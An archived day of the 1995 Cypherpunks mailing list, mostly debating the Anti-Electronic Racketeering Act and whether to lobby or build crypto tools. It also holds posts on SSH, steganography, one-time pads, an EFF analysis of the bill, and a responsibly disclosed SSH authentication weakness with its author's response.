communities.com (Douglas Barnes) Date: Thu, 13 Jul 95 15:07:17 PDT Subject: co-sponsors Message-ID: >I searched Thomas and couldn't find any evidence of co-sponsors to the >Senate bill. Am I wrong here? > >.pm According to Shari Steele: > Fortunately, the bill does not have a very promising future. The bill has > no co-sponsors. It was immediately referred to the Committee on the > Judiciary, where it currently sits. LEXIS's bill tracking report only > gives it a 10% chance of passing out of the committee. From hayden at krypton.mankato.msus.edu Thu Jul 13 15:10:28 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Thu, 13 Jul 95 15:10:28 PDT Subject: Fight, or Roll Over? In-Reply-To: Message-ID: On Thu, 13 Jul 1995, Douglas Barnes wrote: > Since the Anti-Electronic Racketeering Act of 1995 might as well > be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see > Tim throw in the towel already, when the bill hasn't even made it > through committee yet. I don't think Tim threw in the towell on this bill, but has come to realize that the overall war on privacy cannot be won by concentrating on the individual battles. We've ALL got to take a deep breath and come up with a different plan of attack; a plan that the TLAs and spooks will be unable to defend against. Right now, as long as we're kept busy with individual bills and initiatives, they have us just where they want us. ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From ylo at cs.hut.fi Thu Jul 13 15:15:12 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Thu, 13 Jul 95 15:15:12 PDT Subject: Crisis Overload (re Electronic Racketeering) In-Reply-To: Message-ID: <199507132215.BAA17628@shadows.cs.hut.fi> One motivation behind SSH is trying to make it a de-facto standard replacement for rlogin and rsh. That would make it very hard to replace. It provides important benefits in authentication and protection against intruders - and as a side effect it provides hard to break encryption for anyone. Plus, it was created and is primarily distributed *outside* the United States, in a country where none of the algorithms are patented. It can thus be openly available for anyone, and is not limited by US export restrictions. It currently includes two algorithms that I know to be patented: RSA and IDEA. IDEA can be eliminated from it without breaking compability if it turns out necessary (and, several sources say that non-commercial use of IDEA is permitted). RSA is not patented anywhere but in the US, and there it may be possible for most people to get away by using RSAREF. There is more information at http://www.cs.hut.fi/ssh. The RFC describes the protocol. The current list of distribution sites includes: ftp.funet.fi:/pub/unix/security ftp.unit.no:/pub/unix/security ftp.net.ohio-state.edu:/pub/security/ssh ftp.kiae.su:/unix/crypto ftp.cs.hut.fi/pub/ssh More sites are welcome. Tatu Ylonen From lmccarth at cs.umass.edu Thu Jul 13 15:17:44 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Thu, 13 Jul 95 15:17:44 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <199507132116.VAA149322@smtp-gw01.ny.us.ibm.net> Message-ID: <9507132217.AA10568@cs.umass.edu> I wrote: [some dense, ambiguous prose] Jim writes: > Pardon me if I misunderstood your point. I haven't read the whole > bill, but I read the "regardless" phrase with a different emphasis. > In short, that language appears to mean that one could be pounded with > RICO for uploading crypto software even if the crypto is EXPORTABLE. > > The part about subsequent instances of actual access to non-exportable > crypto by foreigners, etc. appears to address a different situation -- > the situation where the crypto is non-exportable. [...] That's exactly my reading of both parts, more lucidly expressed, so I guess my point wasn't clear before :) > It is unclear, not having read the entire bill, whether the onerous > provision in the case of non-exportable crypto would apply in the case > of exportable crypto. Right -- that's the possible ambiguity I was trying to bring out. > This email is academic speculation. This email is not legal advice, > is not a consultation with counsel, and does not create an attorney- > client relationship. (As a condition of entering into an attorney- > client relationship, I require a formal, ink-signed fee agreement.) (Ditto, except that I require some years of law school too ;) -Futplex From an215712 at anon.penet.fi Thu Jul 13 15:26:09 1995 From: an215712 at anon.penet.fi (an215712 at anon.penet.fi) Date: Thu, 13 Jul 95 15:26:09 PDT Subject: LD tentacle? Message-ID: <9507132146.AA04231@anon.penet.fi> has anyone heard of John Bass? based on this recent message, in which he melodramatically tries to stir the shit on a RMIUG list (rocky mountain internet user group) I wonder if L.D. is in fact a John Bass tentacle, or vice versa... From: jbass at dmsd.com (John L. Bass) To: rmiug-discuss at xor.com Subject: The legacy of Ted Smith's, Gary Anderson's, and Mary Newell's actions. The legacy of Ted Smith's, Gary Anderson's, Mary Newell's, and possibly Scott Crawford's (since it was difficult to figure out which side he was on) un-ethical postings combined with inaction of the elected and natural leaders of RMIUG will reflect poorly on the group and it's leaders for years to come. This legacy includes the inaction of the entire readership of rmiug-discuss as well (with the exception of Gabe who is a guest reader from the east coast). Leadership has a number of grave responsibilities and difficult choices - the foremost of which is the preservation of ethical and moral behavior in the group - to protect the reputation of the BOTH group and it's elected and natural leadership. In some instances, none of the available options may be popular - but in-action is by far a greater failing. I deeply regret the events which have unfolded over the last two weeks. Making 10 of 31 posts in a group of 11 posters regarding the MS topic of 6/29 should not be a capital offense. Nor should questioning a board members assertions about the use of the list in the face of historical usage. Nor should questioning the tollarance of highly unethical private and public attacks upon posters. On the 29th I heeded Aleks request after reading it, and made a single additional post. As Gabe noted, we were already winding the debate down. Unfortunately, the several 1-2 hour delivery time of rmiug-discuss delayed Alek's comments. I'm am deeply disappointed that the lessons learned from the last two weeks have come at a great cost to all. I am more concerned the examples set here by Ted Smith, Gary Anderson, and Mary Newell may greatly limit discussion and participation in RMIUG. Each of you *IS* RMIUG. As a group your ethical, intellectual, and moral guidance and leadership can not be ignored in difficult or unpopular times. Many have choosen in the last 3 days to vote with their feet out of disgust. While they can distance themselves from the unpleasant events this way, it is just another form of failing to take more positive steps - maybe out of fear of being targeted themselves. I have many questions about why rmiug at nearly 700 people was unable to maintain a higher level of content (and traffic) as a tool to augment the learning curve of the many new comers to the internet, expand the horizons of all, and form the dialog to bind the readership into a effective functioning group. A highly sucessful topic in a large diverse group this size will only have the interest of 10-30% of the readership, just as the meetings do not benefit and attract the entire group each month. A topic that produces content from 7 posters over 26 messages should not create a fire. A good highly successful topic which really involves the readership, might draw comment from 1% of the readership, some 60-70 people, and include maybe a hundred or two posts. And several at the same time, even more. Expecting the ACCEPTABLE volume of the list to remain under 3-4 per day is a great burden on the usefulness of this list. One difficultly has been that some readers use ISP's and BBS's with extremely small quota's and read their mailbox's infrequently. They have been extremely frustrated at their mbox/quota overflowing from traffic around 50-100KB/wk. For others it has been the relatively poor user interface of some mail readers which limits their ability to select the articles they wish to read. It is hard sometimes to understand the small quota's in the face of disk space costing less than $.30-.50/MB. Maybe one project of this group should be to help find/provide entry level members better access and tools at a nominal or free cost. Dispite Ted Smith's slander and assertions to the contrary, I bring some objectiveness and experience to issues many would prefer to ignore. I loathe the current PC vogue to avoid conflict at all costs - - often with thick sarcasm and an unwillingness to listen to conflicting view points. I am direct, up front, listen well, accept "constructive criticism", and enjoy reasoned civil debate. I have the highest respect for someone who can present/defend their views with a reasoned arguement based upon fact and experience, and in the face of equally reasoned arguements also based upon fact and experience, augment/change their position or possibly agree to disagree when no common ground exists. I've been active some dozen times as the leading exec member of both professional and civic orgs. I last ran a SF Bay area unix users group known as UNIOPS/Silicon Valley Net(SVNet) for over 3 years almost single handledly - including printing and addressing as much as 2000-4000 meeting announcements for bulk mail each month. With current and early breaking topics and speakers I was often capacity limited by the 800 seat room ... often standing room only. When I moved it took me a year, and going dark twice, before I could find a team willing to take over the burden and continue what I had started. Before that I ran two different groups with semi-annual international Unix conferences with between 300 and 1000 attendees as "West Coast Unix Users Group" at SRI International (formerly Standford Research Institute) and as UNIOPS (before helping found /USR/GROUP now known as UNIFORM). I also spent two years on the /usr/group UNIX standards committe as the "Extentions Sub-committe Chairman". Both concurrent and prior to that I did my duty as board member of several Square Dance Clubs and Campus orgs. My public life has been second to my family for the last 7 years. I suspect in part, the hostility here results from a previous unpopular dispute where I called for the resignation of Guy Cook after having CSN drop all the mail for dmsd.com on the floor for many weeks, and then publicly deny that CSN had done so (as well as a number of other management failings at CSN). Guy and CSN have come a long way in the year and a half since, to become probably the best ISP in the state. The road was rocky, but all have learned from the experience, and I hope moved forward, including I. John L. Bass FYI: rmiug-discuss volume by day from 5/18 to present. 30 |-------+---------+---------+---------+----#----+------ | | | | | | | | | | | | | | | | | | | | | | | | 25 | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | 20 |-------+---------+---------+---------+---------+#----- | | | | | | | | | | | | | | | | | | | | | | | | 15 | | | | | | | | | | | | | | | | | | | | | | | | # | | | | | | 10 |-------+---------+---------+---------+---------+------ | # | | | | # | | | | | | | | | | | # | # | | | # # | | 5 | | | | | # | #|# # | |# | | | # # | ## | # | | | # | | # |# ## | # | # #| |# ## | | # | # # | # # | # 0 +----#--+-#--##--##-----####+-##-#---###-#----#-+------ 112222222222330000000001111111111222222222230000000001 890123456789011234567890123456789012345678901234567890 May June July 0000 0000 00 00 00 00 0 000 0 0300 00210000 Group `#' 1211 3494 42 33 21322 64 1 621 1 2071 25029713 Volume *** You received this message because you are on an RMIUG email list *** *** Send email to rmiug at rmiug.org for RMIUG & subscription information *** ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From roy at cybrspc.mn.org Thu Jul 13 15:26:31 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Thu, 13 Jul 95 15:26:31 PDT Subject: The Anti-Racketeering fiasco meets Mozilla Message-ID: <0gDoBDvcwapi@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- I was just talking with a friend, and had the most vile thought. Mallet works part time for the Justice Department. His job is entrapment of random individuals. He has a Web server running the Netscape Commerce Server. When a potential victim is lured into looking at Mallet's home page with Mozilla, the poor sap is rewarded by a server-side push of some small piece of contraband software. Many victims will simply move off the page, forgetting that the document is now in their Netscape cache. They're toast. Others might clear their cache, but the server still shows that the file was sent. They're now guilty of both receiving and concealing contraband. And maybe destruction of evidence and/or interfering with law enforcement. I'm only raving like this because the whole Anti-Racketeering bill has me both scared and really pissed off. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at cybrspc.mn.org -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAWbGBvikii9febJAQExKgP9HApgUEHkIaABuiQ/Lx4jfcfG6WUT7r6U TgiQ83+yvYBt2EeWIlF3uqUN4PEO8cLYsDjthpesI8nDV2HpjTCbiZ0g+zGJlOmi ps8vfRRK0A8elyCkTy2b4NlwR4Kre6iqYJfr9+ZA1rW019ZfvullZw9TAPDrhfLj cP780NHfhn4= =sRJY -----END PGP SIGNATURE----- From ylo at cs.hut.fi Thu Jul 13 15:42:14 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Thu, 13 Jul 95 15:42:14 PDT Subject: Crisis Overload (re Electronic Racketeering) In-Reply-To: Message-ID: <199507132241.BAA18366@shadows.cs.hut.fi> > massive use of cryptography started. This means, and I advocated this > from the day I entered this forum, that programs such as PGP need to be > redesigned so that the a user friendly . . . so user friendly that any > Joe Moron can figure out not only how to use them, but also how it helps > them and how it is "good" for them. This means that we need simplified > key management easy enough for the point-and-click masses to utilize. > This means that common mailing programs, From Elm and Pine to AOLs and > Computer$erve's mailers need to have TRANSPARENT signing of mail messages > and near-transparent encryption of messages. This means that we need to I agree. If you forgive me for again taking the opportunity to advertise SSH, one goal was to make it as simple to use as possible. To get all the benefits of encryption and most benefits of improved authentication, the users need to know absolutely nothing in addition to what they need to know with rlogin. Plus, there are many convenient features, such as automatic X11 forwarding (encrypted; DISPLAY is set to point to a fake display), command exit status is returned properly, etc. Of course, rlogin and rsh are much less important applications for the general public than e-mail. I think the currently the most critical problem areas are exactly e-mail and interactive messaging programs (like irc, rwrite etc). Most mail (at least on the internet) is currently propagated automatically from the sending host to the receiving host. A fairly simple, 90% of the benefit at 10% of the effort solution could be to have sendmail (or equivalent) encrypt all communications that go through the network. This would make electronic mass surveillance and scanning difficult. It is much more expensive (and dangerous publicity-wise) to read messages by breaking into a computer system. This kind of system could be installed without the user even being aware that something like that is in use. It is not a perfect solution - some sites will not support encryption, and some messages might get sent without it. Still, the bulk of the messages would be encrypted, and any really sensitive data could be additionally PGP (or similar) encrypted. The procotol and implementation would have to be well made and established as internet standards. Tatu Ylonen For more information about SSH, see http://www.cs.hut.fi/ssh. From tcmay at sensemedia.net Thu Jul 13 15:54:08 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 13 Jul 95 15:54:08 PDT Subject: Fight, or Roll Over? Message-ID: At 10:41 AM 7/13/95, Douglas Barnes wrote: >Since the Anti-Electronic Racketeering Act of 1995 might as well >be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see >Tim throw in the towel already, when the bill hasn't even made it >through committee yet. I'd hardly call my view "throwing in the towel." What I said clearly enough was that the Washingtonians can throw out repressive legislation much faster than we can--and I speak in terms of "we" as being the EFF, EPIC, NRA, ACLU, etc., and _not_ the Cyherpunks, who have no lobbying activities to speak of. >Go underground? Well, as I read it, this bill basically makes >cypherpunks a "corrupt organization", subject to the full >impact of the RICO statutes. With the passage of this bill, we Indeed, this law makes the Cypherpunks group a co-conspirator. (In the same way that the recent Omnibus Anti-Terrorism (or whatever it's callled) criminalizes groups which support This Year's Enemies. (Like the War with Oceania--or was it Eurasia?--the friend of today was yesterday's criminal organization. For example, the Omnibus bill makes support of anti-PLO groups a crime, for foreigners, as the PLO is now, this year, our "Partner for Peace.") >will have the same status in the US as the neo-Nazis have in >Germany, and will have to adopt similar communications and >organization techniques. Who knows, maybe this is the best thing >that could happen, although I'm real curious about who will >back off to protect their ass-ets and who will actually keep >on chugging towards crypto anarchy. > >In the short term, I've renewed or started memberships in the >organizations that are likely to fight this -- but I'm also >fired up to get more easy-to-use software out there, and >do what I can to help build infrastructure that can resist this >sort of nonsense. This is all I'm suggesting, that yet another round of trying to persuade Congress people is a waste, and that the _traditional_ focus on technology is a better use of our time and effort. Others are welcome to do as they wish. I'm just expressing my view that Washington can spin out legislation faster than we can respond....they are, after all, using our tax dollars to generate new laws, and have intelligence agencies and law enforcement agencies on their side with armies of lawyers and lobbyists to help. Multi-billion dollar budgets are also at stake. The lobbyists for preserving liberty are few and far between. Some would say this means Cypherpunks should step into the fray and become a lobbying group. I don't see us as having the structure or organization to become such a group. Those who wish to should probably form a real group to do this, with bylaws and elected officials. Anarchies are great, but there's no way an anarchy can have a "spokesman," or a budget for travel and lobbying, or a hundred other things that a lobbying group needs. Cypherpunks--this list--is just not in a position to be this group. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From shamrock at netcom.com Thu Jul 13 16:01:40 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 13 Jul 95 16:01:40 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <199507132259.SAA03339@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199507132116.VAA149322 at smtp-gw01.ny.us.ibm.net>, jfmesq at ibm.net (James F. Marshall) wrote: > I haven't read the whole >bill, but I read the "regardless" phrase with a different emphasis. >In short, that language appears to mean that one could be pounded with >RICO for uploading crypto software even if the crypto is EXPORTABLE. The government doesn't want us to use any crypto that takes them an appreciable ammount of time to crack. It seems inevitable to me that such crypto will soon be outlawed. The same goes for anonymous remailers. It is only a matter of (very little) time. Yes, Black Unicorn is right. We need stealth encryption. Unfortunately even that won't help as much as one might think, because it can only be used by tight conspirators who are willing the to take the risk to be locked up in a concentration camp, I mean jail, for the rest of their lives. Crypto for the masses is about to fade away into history, before it ever really caught on. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAWlEyoZzwIn1bdtAQFIYwF+JKboVVw7qm+Ejyj0ecTp1EbqWL2YCAlb tL3RLDWA5VLcKakMh2nI3oZns0SLknGw =+fvE -----END PGP SIGNATURE----- From ylo at cs.hut.fi Thu Jul 13 16:03:36 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Thu, 13 Jul 95 16:03:36 PDT Subject: Ssh security hole? In-Reply-To: <9507132008.AA27925@ima.pa.dec.com.pa.dec.com> Message-ID: <199507132303.CAA18383@shadows.cs.hut.fi> (I'll forward your message to a couple of lists where it might be of interest; the original message is at end.) I think you are right in your analysis. There is indeed a problem with RSA authentication. Basically what this means is that if you log into a corrupt host, that host can at the same time log into another host with your account (by fooling you to answer to the request) provided that you use the same RSA identity for both hosts. A workaround is to use a different identity for each host you use. The default identity can be specified on a per-host basis in the configuration file, or by -i options. And, yes, I think the same problem might occur with client host authentication. Though, there you would still have to do IP-spoofing, DNS spoofing or similar to get through (breaking RSA based host client effectively reduces RhostsRSAAuthentication to conventional .rhosts authentication). The protocol will need to be changed somewhat because of this. I'll think about it tomorrow and let you say you opinion about it. Thanks! Tatu Ylonen Date: Thu, 13 Jul 1995 13:08:15 -0700 From: David Mazieres To: ssh-bugs at cs.hut.fi Cc: rtm at eecs.harvard.edu, dm at eecs.harvard.edu, tbl at eecs.harvard.edu Subject: Ssh security hole? I believe there is a serious problem with the RSA authentication scheeme used in ssh, but then again I could be misreading the proposed RFC. Is the following really the case? As I understand the protocol, here is what happens during SSH_AUTH_RSA authentication. Suppose the holder of SKu, is allowed access to account U on machine B (which holds SKb). Both PKu and PKb are widely known. In addition, machine B has a session key, PKs, which changes every hour. When U on machine A wants to log into machine B, here's what I think happens based on my reading of the RFC: A -> B: A B -> A: (PKb, PKs, COOKIE) [A flags an error if PKb is not the stored value.] A -> B: (COOKIE, {{Kab}_PKs}_PKb) A -> B: {U}_Kab A -> B: {PKu}_Kab [B aborts if SKu is not allowed access to account U.] B -> A: {{N}_PKu}_Kab A -> B: {{N}_MD5}_Kab (*) [B aborts if the MD5 hash is invalid.] B -> A: access to acount U with all data encrypted by Kab. The problem is, suppose U actually wanted to log into machine C, which was maintained by an untrusted person. The person maintaining C could initiate a connection to B the minute U tried to log into C. When given a challenge {{N}_PKu}_Kbc, C could simply give this to A as the challenge to respond to, and then forward the response to B. To fix the problem, A must at the very least include B in the response line marked (*). I have reason to believe (after having just seen a lecture on authentication), that you might even need to include more. A safe bet might be (but then again I am no expert): A -> B: {(N, A, B, Kab)}_MD5 I think similar problems arise for the other authentication methods. Other than that, though, I am really impressed by by ssh. It's easy to install and easy to use. In fact, it is even more convenient to use than standard rsh, because the X forwarding happens automatically. Thanks for such a great package! David From tcmay at sensemedia.net Thu Jul 13 16:09:37 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 13 Jul 95 16:09:37 PDT Subject: Fight, or Roll Over? Message-ID: At 10:10 PM 7/13/95, Robert A. Hayden wrote: >On Thu, 13 Jul 1995, Douglas Barnes wrote: > >> Since the Anti-Electronic Racketeering Act of 1995 might as well >> be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see >> Tim throw in the towel already, when the bill hasn't even made it >> through committee yet. > >I don't think Tim threw in the towell on this bill, but has come to >realize that the overall war on privacy cannot be won by concentrating on >the individual battles. We've ALL got to take a deep breath and come up >with a different plan of attack; a plan that the TLAs and spooks will be >unable to defend against. Right now, as long as we're kept busy with >individual bills and initiatives, they have us just where they want us. Exactly! By causing us to go into paroxysms of activity every time they throw a new piece of legislation over the transom, we dissipate our efforts in more promising areas. There's a place for lobbying--and I'm even a member of the EFF. But lobbying is best done by those with lobbying backgrounds, legal backgrounds, and a penchant for fund-raising. There was once talk, in April of '93, about the Washington, D.C. Cypherpunks group adopting "lobbying" as their own special focus area, with educational visits to Congressional aides and attendance at crypto-related hearings. Nothing came of this, for whatever reasons. Why do I mention this? Most Cypherpunks live far from Washington, and our influence is minimal. Few can travel to D.C. on even an occasional basis, etc. (Ironically, EFF is evacuating D.C. I won't get into what their reasons might be, but certainly they will now have even less effect. I'll say one thing: the leaders of EFF may have realized what a trap lobbying can become, and have chosen to instead focus on other areas.) Anyway, Cypherpunks is a worldwide, technological-oriented group. We can do more by spreading technology and undermining repressive legislation than we can by being just another ineffectual lobbying group. As I said in another message, if folks want to do it, fine. Organizationally and financially, we are not equipped for lobbying. No budget, no leadership, no bylaws, no tax filings, no report writings, nothing. (Some of these things are important for lobbying, some are less so. The "leadership" part is pretty important: who could claim to "speak" on behalf of Cypherpunks? Nobody.) I suggest a different organization, a different mailing list, for this effort. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From cman at communities.com Thu Jul 13 16:21:19 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 13 Jul 95 16:21:19 PDT Subject: Fight, or Roll Over? Message-ID: >At 10:41 AM 7/13/95, Douglas Barnes wrote: > >>Since the Anti-Electronic Racketeering Act of 1995 might as well >>be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see >>Tim throw in the towel already, when the bill hasn't even made it >>through committee yet. > >I'd hardly call my view "throwing in the towel." What I said clearly enough >was that the Washingtonians can throw out repressive legislation much >faster than we can--and I speak in terms of "we" as being the EFF, EPIC, >NRA, ACLU, etc., and _not_ the Cyherpunks, who have no lobbying activities >to speak of. > I'm not advocating that cypherpunks lobby -- we clearly don't have the organization or the right image to be doing that. I _do_ think that it's important to support the EFF, EPIC and ACLU who will almost certainly be fighting this very important rearguard action while we try to get _our_ act together. I'm not sure the NRA bears on this exact matter, but I think it's high time one of the other three started doing "jack booted thug"-type fundraising letters. This means, for those not reading between the lines, doing something more than online ranting and petition-signing, such as getting out the checkbook and supporting those who are organized to fight these things, and actually getting off the dime and doing things like writing letters, sending telegrams, and otherwise harassing our elected beings through media that they understand (since, clearly, they _don't_ understand the Internet -- if they did, they wouldn't propose legislation like this.) Yes, the "bad guys" can crank out unfriendly legislation faster than the "good guys" can fight it, but since we are clearly not ready to offer technological solutions this month, the "good guys" act as a valuable brake on this current swing of the pendulum. From ylo at cs.hut.fi Thu Jul 13 16:26:45 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Thu, 13 Jul 95 16:26:45 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: <199507132326.CAA18396@shadows.cs.hut.fi> > So, what countries are left free of encryption regulations? (English > speaking preffered, with affordable net access.) Time to see about > getting a new passport... Finland, as far as I know, does not have any restrictions on encryption, and has a friendly population. Finnish is indecipherable at first, but almost everybody can speak English (at least the younger population). There is a big shortage of competent computer and electronics engineers. Nokia Telecommunications (a major mobile phone manufacturer) for example would need much more competent people than they can get - not to mention the smaller companies. Finland has excellent network connections - typical ftp rates from the US are tens of kilobytes per second (except at peak hours). There is a lot of competition among the internet service provides. About $20/months gets you 28.8k dialup ppp (1-2 hours/day at that rate, I think). Another provider charges about 5 cents per minute. A leased 64k line is around $100/month. The climate is nice during the summer (15-25 Celsius typical), and cold during the winter. Taxes are outrageous though, so you really had better check that first. But, the taxes include things like medical insurance, pension insurance, etc., and are thus not directly comparable. And of course, we are now a member of the European Union, which worries me a little on this front... (Sorry, I just couldn't resist the temptation :-) Tatu From hayden at krypton.mankato.msus.edu Thu Jul 13 16:32:21 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Thu, 13 Jul 95 16:32:21 PDT Subject: On a lighter note... Message-ID: Well, for all those that are looking for something a little lighter after todays activity, the new version of the Geek Code (version 3.0) was released this morning. You can find it via your favorite web browser at: http://krypton.mankato.msus.edu/~hayden/geek.html Or finger me for info on how to get it in ASCII version. Comments appreciated. I know the revamped political sections aren't perfect, but they are a little better. ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From tcmay at sensemedia.net Thu Jul 13 16:35:48 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 13 Jul 95 16:35:48 PDT Subject: Fight, or Roll Over? Message-ID: At 10:56 PM 7/13/95, Timothy C. May wrote: >At 10:41 AM 7/13/95, Douglas Barnes wrote: > >>Since the Anti-Electronic Racketeering Act of 1995 might as well >>be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see >>Tim throw in the towel already, when the bill hasn't even made it >>through committee yet. > >I'd hardly call my view "throwing in the towel." What I said clearly enough >was that the Washingtonians can throw out repressive legislation much >faster than we can--and I speak in terms of "we" as being the EFF, EPIC, ^ I meant to say, "...than we can respond to" --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From hoz at univel.telescan.com Thu Jul 13 16:38:30 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Thu, 13 Jul 95 16:38:30 PDT Subject: def'n of "computer network" Message-ID: <9507132338.AA07522@toad.com> imsi.com!perry ("Perry E. Metzger") writes: >My opinion is that stegonography "standards" are useless. > Anyone can >try unpeeling the GIFs and see if something interesting shows up >inside. That means that the only useful stego suffers from the defect >that symmetric key cryptography suffers from -- you have to have made >serious pre-arrangements with the counterparty. Perry, I don't understand. If the least significant bits in my gif file follow all the "known statistical distributions", how can anyone know whether they are "just noise" or are an encrypted message, (asymmetric or symmetric, either one) unless they have the key? Why can't there be public key steganography? Perhaps existing tools are inadequate, but are they impossible? Rick F. Hoselton (who doesn't claim to present opinions for others) From Doug.Hughes at Eng.Auburn.EDU Thu Jul 13 16:46:51 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Thu, 13 Jul 95 16:46:51 PDT Subject: OTP server.. Message-ID: <199507132346.SAA07316@netman.eng.auburn.edu> How about WWW one time pad servers? You browse to your favorite OTP server, which has a random number generator running in the background. You tell it to give you a block of X bytes, and mail it to persons 1, 2, 3, ... N. These people then use this OTP for encrypting a document. It wouldn't be illegal because you aren't encoding any data and distributing it.. You're generating raw data. You wouldn't have to distribute any crypto software, you just xor your data file with the number of bytes that you were sent in the mail from the OTP server.. Enough of these things would be REALLY tough to monitor.. Plus, you could connect 8 different times and just pick one of the sets.. Or you could just use a portion of the set that you and the receiving party agreed upon. Or, instead of using email, you could have a application/x-otp browser that would collect the OTP that the server sent out to you over HTTP. (this would be really hard to differentiate from other data if the server was doing other things at the same time). Thoughts? Doug Hughes Engineering Network Services doug at eng.auburn.edu Auburn University From gnu at toad.com Thu Jul 13 16:50:50 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 13 Jul 95 16:50:50 PDT Subject: EFF analysis: Anti-Electronic Racketeering Act (S.974) Message-ID: <9507132350.AA08064@toad.com> From: ssteele at eff.org (Shari Steele) ***** FEEL FREE TO DISTRIBUTE WIDELY ***** On June 27, Senator Grassley (R-Iowa) introduced the Anti-Electronic Racketeering Act, S.974. The bill was designed "to prohibit certain acts involving the use of computers in the furtherance of crimes, and for other purposes." Its immediate effect, among other things, would be to criminalize the posting of any encryption software on any computer network that foreign nationals can access (in other words, any computer network period). Because of poor wording, the bill would probably also criminalize data compression and other non-cryptographic encoding schemes available on networks. This includes the compression used in most of the images on Internet user's WWW homepages, not to mention uu and binhex encoding for transferring binary files via email, and even language encoding used to represent non-English characters, such as the SJIS scheme for representing Japanese characters. In addition, the bill seems to be directed at undermining two big fights we've successfully waged in the past: the Steve Jackson Games decision against the United States Secret Service and the government's Clipper Chip proposal. Re: Steve Jackson Games -- this bill would permit the government to avoid the notice requirements of the Privacy Protection Act if "there is reason to believe that the immediate seizure of such materials is necessary to prevent the destruction or altercation [very Freudian sic!] of such documents." Furthermore, the government could use electronic evidence seized that had not been particularly described in a warrant if "the seizure is incidental to an otherwise valid seizure, and the government officer or employee- ''(A) was not aware that work product material was among the data seized; ''(B) upon actual discovery of the existence of work product materials, the government officer or employee took reasonable steps to protect the privacy interests recognized by this section, including- ''(i) using utility software to seek and identify electronically stored data that may be commingled or combined with non-work product material; and ''(ii) upon actual identification of such material, taking reasonable steps to protect the privacy of the material, including seeking a search warrant." Re: Clipper Chip -- The bill would make it a crime "to distribute computer software that encodes or encrypts electronic or digital communications to computer networks that the person distributing the software knows or reasonably should know, is accessible to foreign nationals and foreign governments, regardless of whether such software has been designated as nonexportable." However, there is an exception: "It shall be an affirmative defense to prosecution under this section that the software at issue used a universal decoding device or program that was provided to the Department of Justice prior to the distribution." This is essentially an attempt to sneak the key "escrow" provisions of the Clipper scheme in through a legislative back door. Fortunately, the bill does not have a very promising future. The bill has no co-sponsors. It was immediately referred to the Committee on the Judiciary, where it currently sits. LEXIS's bill tracking report only gives it a 10% chance of passing out of the committee. I thought Senator Grassley's own statement when he introduced the bill is worth reading, so I'm attaching it here. My favorite line is "Elliott Ness needs to meet the Internet." This is especially ironic in light of recent comparisons of hysteria about "dangerous" material on the internet, and Prohibition. The bill itself follows. Shari ------------------------------------------------------------------------ Shari Steele, Director of Legal Services ssteele at eff.org Electronic Frontier Foundation 202/861-7700 (voice) 1667 K Street, N.W., Suite 801 202/861-1258 (fax) Washington, DC 20006-1605 202/861-1224 (BBS) ---------- Senator 